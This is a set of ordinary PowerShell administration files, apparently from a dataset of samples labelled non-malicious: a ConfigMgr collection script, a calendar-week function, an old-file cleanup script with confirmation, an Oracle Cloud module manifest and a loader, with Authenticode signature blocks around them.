IFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDNeOsp0fXg # Az7GUF0N+/0EHcQFri6wliTbmQNmFm8Di0CeQ8n4bd2td5tbtzTsEk7dY2/nmWY9 # kqEvavbdYRbNc+Esv8Nfv6MMImH9tCr5Kxs254MQ0jmpRucrm3uHW421Cfva0hNQ # EKN1NS0rad1U/ZOme+V/QeSdWKofCThxf/fsTeR41WbqUNAJN/ml3sbOH8aLhXyT # HG7sVt/WUSLpT0fLlNXYGRXzavJ1qUOePzyj86hiKyzQJLTjKr7GpTGFySiIcMW/ # nyK6NK7Rjfy1ofLdRvvtHIdJvpmPSze3CH/PYFU21TqhIhZ1+AS7RlDo18MSDGPH # pTCWwo7lgtY1pY6RvPIguF3rbdtvhoyjn5mPbs5pgjGO83odBNP7IlKAj4BbHUXe # Hit3Da2g7A4jicKrLMjo6sGeetJoeKooj5iNTXbDwLKM9HlUdXZSz62ftCZVuK9F # BgkAO9MRN2pqBnptBGfllm+21FLk6E3vVXMGHB5eOgFfAy84XlIieycQArIDsEm9 # 2KHIFOGOgZlWxe69leXvMHjYJlpo2VVMtLwXLd3tjS/173ouGMRaiLInLm4oIgqD # tjUIqvwYQUh3RN6wwdF75nOmrpr8wRw1n/BKWQ5mhQxaMBqqvkbuu1sLeSMPv2PM # ZIddXPbiOvAxadqPkBcMPUBmrySYoLTxwwIDAQABo4IBSTCCAUUwHQYDVR0OBBYE # FPbTj0x8PZBLYn0MZBI6nGh5qIlWMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNv # bS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEw # KDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cu # bWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFt # cCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAww # CgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCu # nA6aSP48oJ1VD+SMF1/7SFiTGD6zyLC3Ju9HtLjqYYq1FJWUx10I5XqU0alcXTUF # UoUIUPSvfeX/dX0MgofUG+cOXdokaHHSlo6PZIDXnUClpkRix9xCN37yFBpcwGLz # EZlDKJb2gDq/FBGC8snTlBSEOBjV0eE8ICVUkOJzIAttExaeQWJ5SerUr63nq6X7 # PmQvk1OLFl3FJoW4+5zKqriY/PKGssOaA5ZjBZEyU+o7+P3icL/wZ0G3ymlT+Ea4 # h9f3q5aVdGVBdshYa/SehGmnUvGMA8j5Ct24inx+bVOuF/E/2LjIp+mEary5mOTr # ANVKLym2kW3eQxF/I9cj87xndiYH55XfrWMk9bsRToxOpRb9EpbCB5cSyKNvxQ8D # 00qd2TndVEJFpgyBHQJS/XEK5poeJZ5qgmCFAj4VUPB/dPXHdTm1QXJI3cO7DRyP # UZAYMwQ3KhPlM2hP2OfBJIr/VsDsh3szLL2ZJuerjshhxYGVboMud9aNoRjlz1Mc # n4iEota4tam24FxDyHrqFm6EUQu/pDYEDquuvQFGb5glIck4rKqBnRlrRoiRj0qd # hO3nootVg/1SP0zTLC1RrxjuTEVe3PKrETbtvcODoGh912Xrtf4wbMwpra8jYszz # r3pf0905zzL8b8n8kuMBChBYfFds916KTjc4TGNU9TCCB3EwggVZoAMCAQICEzMA # AAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290 # IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMw # MDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0G # CSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3u # nAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1 # jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZT # fDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+ # jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c # +gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+ # cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C6 # 26p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV # 2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoS # CtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxS # UV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJp # xq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkr # BgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0A # XmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYI # KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9S # ZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIE # DB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNV # HSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVo # dHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29D # ZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAC # hj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1 # dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwEx # JFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts # 0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9I # dQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYS # EhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMu # LGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT9 # 9kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2z # AVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6Ile # T53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6l # MVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbh # IurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3u # gm2lBRDBcQZqELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9z # b2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNO # Ojk2MDAtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQBIp++xUJ+f85VrnbzdkRMSpBmvL6CBgzCB # gKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUA # AgUA6UKZ8zAiGA8yMDI0MDEwNTE1MDgzNVoYDzIwMjQwMTA2MTUwODM1WjB0MDoG # CisGAQQBhFkKBAExLDAqMAoCBQDpQpnzAgEAMAcCAQACAhROMAcCAQACAhMrMAoC # BQDpQ+tzAgEAMDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEA # AgMHoSChCjAIAgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAEvtSTCXcDDzc558 # biIX2UN1x5QKh26/ewRcnE8VGYHrxj6Y0Z8AKbMeiUoDP+1OLKbvo53WXXflEWcq # ethFNggrhGJ99Z9qAivLzOwtEpJ4ITYvxdf8/1OCGHxL+Ud5rEVdXkVR9uIABjaM # t2IrLVzNOjkQ9rfJzuDq4GfHGObbxOMEZGfDiD4xbmXqxyjw35ME2/EdmeOpdqWy # RCZrVD+sSN89mjQyYmMeRiHVHFAE52pfPr8q051GRamUz/sMA+GYhMih7/hRTjM3 # T+DT34AkHyK3eOqz6hyaroLgFmY/NJegGsDx4X9au1/fY8a+ZuZzGlF9TyNjLAXv # MO+T5qkxggQNMIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MAITMwAAAdj8SzOlHdiFFQABAAAB2DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZI # hvcNAQkDMQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCDmf7xkZZl9mdpj # lZOT0kCywaYZW3GG8PlCdEJTlAqPuDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQw # gb0EIDrjIX/8CZN3RTABMNt5u73Mi3o3fmvq2j8Sik+2s75UMIGYMIGApH4wfDEL # MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v # bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWlj # cm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHY/EszpR3YhRUAAQAAAdgw # IgQgBU99AfLdOK8qSWY2FikkkUMQLakrhoLjrFUBP83wRRgwDQYJKoZIhvcNAQEL # BQAEggIAooKPz8CZQYFTqKDVVxISRKy9v+vmxEfOJ5/55Egkz37cS8WCp2y9mJuj # KYQ3XvWvXKHDVYGJC07VynxJg2gWbPpMAvafsTrmcgx60ObH/Qbq4KOg/d0kfgCW # D+8DioS7gP3QGJYRJKnhmDNQPTLF/+QDVrb1d9q6f9+KUuhLvNTQc0zy2TRJ4EyV # kIxeaZ0kPKdqFbz91sD/zpV7+fMc1ZxXhaywPCCTDHWcsSvXwf4c+BT4b/ArFuNl # KR9x+dMmFkGdEGAVtcLqk1VR559t7Is7NebmNZVuwFTRQ4dx00LAOQD+951kJw2r # +XReF4VwhggEcbB9wPU8X/CwFKuwc1Pq9Bpu+wMkWhNNQK5ze+zACTDiOtHRAbuh # VC2TIBxoOxYEelwCNMtL6RLZgmimnJ5jZx260m8wh9P8fiBh1uSgSrxGvUqubGuI # 3NFdWfttgsBNlbfGh7WaVDehSzRmG1rdOMzc1HCjWOXotWIvS+SNhhpQVZPM0ALP # ICNzosRrqKzV4SVWP7jgPLS6qs57WRoxAanWeNTJYTu6/F7MFJOWxGnh2/jlfVPl # vdOVIB9v/XkFYxiHCKySNgpkrfSvI1lUrqXyqF2FmUFo4TQ3VdHB+x8WUIXSIqZf # FSkFniulSga9Ly2T0awIwT30IgPOtlSgmeGDTvromPTsm4O3lOc= # SIG # End signature block
combined_dataset/train/non-malicious/2420.ps1
2420.ps1
[CmdletBinding()] param ( [Parameter(Mandatory = $False, ValueFromPipeline = $False, ValueFromPipelineByPropertyName = $False, HelpMessage = 'What site server would you like to connect to?')] [string]$Server = 'CONFIGMANAGER', [Parameter(Mandatory = $False, ValueFromPipeline = $False, ValueFromPipelineByPropertyName = $False, HelpMessage = 'What site does your ConfigMgr site server exist in?')] [string]$Site = 'UHP', [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, HelpMessage = 'What device collection would you like to get clients from?')] [string]$SourceCollectionName, [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, HelpMessage = 'What device collection would you like to put the random clients into?')] [string]$DestinationCollectionName, [Parameter(Mandatory = $True, ValueFromPipeline = $False, ValueFromPipelineByPropertyName = $True, HelpMessage = 'How many random clients would you like to put into the destination collection?')] [int]$NumberOfClients ) begin { try { $BeforeLocation = (Get-Location).Path Set-Location "$Site`:" $ConfigMgrWmiProps = @{ 'ComputerName' = $Server; 'Namespace' = "root\sms\site_$Site" } Write-Verbose 'Verifying parameters...' if (!(Get-CmDeviceCollection -Name $SourceCollectionName)) { throw "$SourceCollectionName does not exist" } elseif (!(Get-CmDeviceCollection -Name $DestinationCollectionName)) { throw "$DestinationCollectionName does not exist" } $SourceCollectionId = (Get-WmiObject @ConfigMgrWmiProps -Class SMS_Collection -Filter "Name = '$SourceCollectionName'").CollectionId $DestinationCollectionId = (Get-WmiObject @ConfigMgrWmiProps -Class SMS_Collection -Filter "Name = '$DestinationCollectionName'").CollectionId $SourceClients = Get-WmiObject @ConfigMgrWmiProps -Class "SMS_CM_RES_COLL_$SourceCollectionId" | where { $_.DeviceOS -match 'Microsoft Windows NT' } | select Name, DeviceOS | group DeviceOS | sort count -Descending $ExistingDestinationClients = Get-WmiObject @ConfigMgrWmiProps -Class "SMS_CM_RES_COLL_$DestinationCollectionId" | select -ExpandProperty Name if ($SourceClients.Count -eq 0) { throw 'Source collection does not contain any members' } $TargetClients = @() } catch { Write-Error $_.Exception.Message } } process { try { if ($NumberOfClients -lt $SourceClients.Count) { Write-Verbose "Number of clients needed ($NumberOfClients) are less than total number of operating system groups ($($SourceClients.Count))..." $OsGroups = $SourceClients[0..($NumberOfClients - 1)] } else { Write-Verbose "Number of clients needed ($NumberOfClients) are equal to or exceed total operating system groups ($($SourceClients.Count))..." $OsGroups = $SourceClients } Write-Verbose "Total OS groupings: $($OsGroups.Count)" for ($i = 0; $TargetClients.Count -lt $NumberOfClients; $i++) { $GroupIndex = $i % $OsGroups.Count Write-Verbose "Using group index $GroupIndex..." $OsGroup = $OsGroups[$GroupIndex].Group Write-Verbose "Using group $($OsGroups[$GroupIndex].Name)..." $ClientName = ($OsGroups[$GroupIndex].Group | Get-Random).Name Write-Verbose "Testing $ClientName for validity to add to target collection..." if (($TargetClients -notcontains $ClientName) -and ($ExistingDestinationClients -notcontains $ClientName) -and (Test-Ping $ClientName)) { Write-Verbose "$ClientName found to be acceptable. Adding to target collection array..." $TargetClients += $ClientName } } Write-Verbose 'Finished checking clients. Begin adding to target collection...' $TargetClients | foreach { Write-Verbose "Adding $($_) to target collection $DestinationCollectionName..." Add-CMDeviceCollectionDirectMembershipRule -CollectionName $DestinationCollectionName -ResourceId (Get-CmDevice -Name $_).ResourceID } } catch { Write-Error $_.Exception.Message } } end { Set-Location $BeforeLocation }
combined_dataset/train/non-malicious/Get-CalendarWeek_1.ps1
Get-CalendarWeek_1.ps1
# Get-CalendarWeek by Holger Adam # Simple function to retrieve the calendar week to a given or the current date. function Get-CalendarWeek { param( $Date ) # check date input if ($Date -eq $null) { $Date = Get-Date } # get current culture object $Culture = [System.Globalization.CultureInfo]::CurrentCulture # retrieve calendar week $Culture.Calendar.GetWeekOfYear($Date, $Culture.DateTimeFormat.CalendarWeekRule, $Culture.DateTimeFormat.FirstDayOfWeek) }
combined_dataset/train/non-malicious/2372.ps1
2372.ps1
[CmdletBinding(SupportsShouldProcess, ConfirmImpact = 'High')] param ( [Parameter(Mandatory)] [ValidateNotNullOrEmpty()] [string[]]$FolderPath, [Parameter(Mandatory)] [ValidateNotNullOrEmpty()] [int]$DaysOld, [Parameter()] [ValidateNotNullOrEmpty()] [ValidateLength(1, 3)] [string]$FileExtension ) $Now = Get-Date $gciParams = @{ 'Recurse' = $true 'File' = $true } if ($PSBoundParameters.ContainsKey('FileExtension')) { $gciParams.Filter = "Extension -eq $FileExtension" } $LastWrite = $Now.AddDays(-$DaysOld) foreach ($path in $FolderPath) { $gciParams.Path = $path ((Get-ChildItem @gciParams).Where{ $_.LastWriteTime -le $LastWrite }).foreach{ if ($PSCmdlet.ShouldProcess($_.FullName, 'Remove')) { Remove-Item -Path $_.FullName -Force } } }
combined_dataset/train/non-malicious/sample_43_81.ps1
sample_43_81.ps1
# # Module manifest for module 'OCI.PSModules.Marketplaceprivateoffer' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Marketplaceprivateoffer.dll' # Version number of this module. ModuleVersion = '83.2.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '18d53499-afff-4406-90f6-9ce3e95e074d' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Marketplaceprivateoffer Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.2.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Marketplaceprivateoffer.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIMarketplaceprivateofferAttachment', 'Get-OCIMarketplaceprivateofferAttachmentContent', 'Get-OCIMarketplaceprivateofferAttachmentsList', 'Get-OCIMarketplaceprivateofferOffer', 'Get-OCIMarketplaceprivateofferOfferInternalDetail', 'Get-OCIMarketplaceprivateofferOffersList', 'New-OCIMarketplaceprivateofferAttachment', 'New-OCIMarketplaceprivateofferOffer', 'Remove-OCIMarketplaceprivateofferAttachment', 'Remove-OCIMarketplaceprivateofferOffer', 'Update-OCIMarketplaceprivateofferOffer' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Marketplaceprivateoffer' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_6_24.ps1
sample_6_24.ps1
Get-ChildItem -Path $PSScriptRoot\*.ps1 | Foreach-Object{ . $_.FullName } # SIG # Begin signature block # MIItDQYJKoZIhvcNAQcCoIIs/jCCLPoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDfA60pZ8m/WODa # 6KPKEwubP6md3gyGLcDO1yUJfefgraCCEmMwggXfMIIEx6ADAgECAhBOQOQ3VO3m # jAAAAABR05R/MA0GCSqGSIb3DQEBCwUAMIG+MQswCQYDVQQGEwJVUzEWMBQGA1UE # ChMNRW50cnVzdCwgSW5jLjEoMCYGA1UECxMfU2VlIHd3dy5lbnRydXN0Lm5ldC9s # ZWdhbC10ZXJtczE5MDcGA1UECxMwKGMpIDIwMDkgRW50cnVzdCwgSW5jLiAtIGZv # ciBhdXRob3JpemVkIHVzZSBvbmx5MTIwMAYDVQQDEylFbnRydXN0IFJvb3QgQ2Vy # dGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMjAeFw0yMTA1MDcxNTQzNDVaFw0zMDEx # MDcxNjEzNDVaMGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMu # MUIwQAYDVQQDDDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRp # b24gQXV0aG9yaXR5IC0gQ1NCUjEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK # AoICAQCngY/3FEW2YkPy2K7TJV5IT1G/xX2fUBw10dZ+YSqUGW0nRqSmGl33VFFq # gCLGqGZ1TVSDyV5oG6v2W2Swra0gvVTvRmttAudFrnX2joq5Mi6LuHccUk15iF+l # OhjJUCyXJy2/2gB9Y3/vMuxGh2Pbmp/DWiE2e/mb1cqgbnIs/OHxnnBNCFYVb5Cr # +0i6udfBgniFZS5/tcnA4hS3NxFBBuKK4Kj25X62eAUBw2DtTwdBLgoTSeOQm3/d # vfqsv2RR0VybtPVc51z/O5uloBrXfQmywrf/bhy8yH3m6Sv8crMU6UpVEoScRCV1 # HfYq8E+lID1oJethl3wP5bY9867DwRG8G47M4EcwXkIAhnHjWKwGymUfe5SmS1dn # DH5erXhnW1XjXuvH2OxMbobL89z4n4eqclgSD32m+PhCOTs8LOQyTUmM4OEAwjig # nPqEPkHcblauxhpb9GdoBQHNG7+uh7ydU/Yu6LZr5JnexU+HWKjSZR7IH9Vybu5Z # HFc7CXKd18q3kMbNe0WSkUIDTH0/yvKquMIOhvMQn0YupGaGaFpoGHApOBGAYGuK # Q6NzbOOzazf/5p1nAZKG3y9I0ftQYNVc/iHTAUJj/u9wtBfAj6ju08FLXxLq/f0u # DodEYOOp9MIYo+P9zgyEIg3zp3jak/PbOM+5LzPG/wc8Xr5F0wIDAQABo4IBKzCC # AScwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0lBBYw # FAYIKwYBBQUHAwMGCCsGAQUFBwMIMDsGA1UdIAQ0MDIwMAYEVR0gADAoMCYGCCsG # AQUFBwIBFhpodHRwOi8vd3d3LmVudHJ1c3QubmV0L3JwYTAzBggrBgEFBQcBAQQn # MCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDAGA1UdHwQp # MCcwJaAjoCGGH2h0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZzJjYS5jcmwwHQYDVR0O # BBYEFIK61j2Xzp/PceiSN6/9s7VpNVfPMB8GA1UdIwQYMBaAFGpyJnrQHu995ztp # UdRsjZ+QEmarMA0GCSqGSIb3DQEBCwUAA4IBAQAfXkEEtoNwJFMsVXMdZTrA7LR7 # BJheWTgTCaRZlEJeUL9PbG4lIJCTWEAN9Rm0Yu4kXsIBWBUCHRAJb6jU+5J+Nzg+ # LxR9jx1DNmSzZhNfFMylcfdbIUvGl77clfxwfREc0yHd0CQ5KcX+Chqlz3t57jpv # 3ty/6RHdFoMI0yyNf02oFHkvBWFSOOtg8xRofcuyiq3AlFzkJg4sit1Gw87kVlHF # VuOFuE2bRXKLB/GK+0m4X9HyloFdaVIk8Qgj0tYjD+uL136LwZNr+vFie1jpUJuX # bheIDeHGQ5jXgWG2hZ1H7LGerj8gO0Od2KIc4NR8CMKvdgb4YmZ6tvf6yK81MIIG # CDCCA/CgAwIBAgIQBu9mzEaGqLK0hNoZKy1rYTANBgkqhkiG9w0BAQ0FADBPMQsw # CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjEoMCYGA1UEAxMfRW50 # cnVzdCBDb2RlIFNpZ25pbmcgQ0EgLSBPVkNTMjAeFw0yNDA0MTkwOTE2MDlaFw0y # NTA1MTIwOTE2MDhaMIGEMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxEzAR # BgNVBAcTClJvdW5kIFJvY2sxEjAQBgNVBAoTCURlbGwgSW5jLjEoMCYGA1UECxMf # U2VydmVyIFN5c3RlbXMgTWdtdCBFbmdpbmVlcmluZzESMBAGA1UEAxMJRGVsbCBJ # bmMuMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAvFatHoJS1lbvBD4U # x/jt6hrhOHlGpntV/TPJbKwAdvG6SCT6MfdFasEGShyzypfx8adv3v+sFWo84yYB # GqnqH/Kkj48BTKNREXjN3x/jLZrv+rVRQJYG79us7u3vQVSBX0ds0Jcd9f7u2REE # aLBKrd7ZwxmsHoiAaqKYBm8nMo4kmH4xOw6cOXxUW6mkYxNQxn60nxV5A2ZJvUKn # YvanuULo5jGrl+t2A5jInOLyxSmNU62DdLbyhtE3B6cEhe5yQ54hi7d6c5IM2fNH # FNrQkRavAWUyAxPPBpTSsR0g/IkNymbNPCTjgvDQOIJBcMp0C+q158RIBiE+IMwq # QGi7aUvUUhzTQG9NcSDQan3hMmYfevU3RLQMw4OcoGIT/jOSYmgtcLHiB6lnOG/h # iJ8EsQgW1s2yJ7vG2Fo/IHvQjbfFxefO+gluw4UjcLZgIqACIlFNYGaq4rzKtTeF # 1NNy6DjjbJV2nt/JlD68YlFg0pU9rGDKglZFWvfWiLId8IJnAgMBAAGjggEoMIIB # JDAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRFrXrMchlvXUnwqKV0rQOPRSgzqzAf # BgNVHSMEGDAWgBTvn7p5sHPyJR54nANSnBtThN6N7TBnBggrBgEFBQcBAQRbMFkw # IwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDIGCCsGAQUFBzAC # hiZodHRwOi8vYWlhLmVudHJ1c3QubmV0L292Y3MyLWNoYWluLnA3YzAxBgNVHR8E # KjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3QubmV0L292Y3MyLmNybDAOBgNV # HQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwEwYDVR0gBAwwCjAIBgZn # gQwBBAEwDQYJKoZIhvcNAQENBQADggIBACoeAWs2aV9gf+TF4AGOKc454/E55mVR # 